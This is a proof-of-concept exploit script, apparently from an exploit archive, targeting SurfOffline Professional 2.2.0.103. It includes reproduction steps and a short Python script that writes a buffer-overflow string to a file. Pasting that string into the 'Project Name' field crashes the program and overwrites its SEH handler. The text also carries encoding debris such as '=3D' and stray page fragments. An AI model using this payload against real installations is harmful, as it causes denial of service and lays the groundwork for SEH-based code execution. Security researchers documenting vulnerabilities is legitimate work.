26 lines
No EOL
891 B
Python
Executable file
26 lines
No EOL
891 B
Python
Executable file
# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
|
|
# Date: 2019-12-18
|
|
# Exploit Author: Chris Inzinga
|
|
# Vendor Homepage: http://www.bimesoft.com/
|
|
# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
|
|
# Version: 2.2.0.103
|
|
# Tested on: Windows 7 SP1 (x86)
|
|
|
|
# Steps to reproduce:
|
|
# 1. Generate a malicious payload via the PoC
|
|
# 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
|
|
# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
|
|
# 4. Observe a program DOS crash, overwriting SEH=20
|
|
|
|
#!/usr/bin/python
|
|
|
|
payload =3D "A" * 382 + "B" * 4 + "C" * 4
|
|
|
|
try:
|
|
fileCreate =3Dopen("exploit.txt","w")
|
|
print("[x] Creating file")
|
|
fileCreate.write(payload)
|
|
fileCreate.close()
|
|
print("[x] File created")
|
|
except:
|
|
print("[!] File failed to be created") |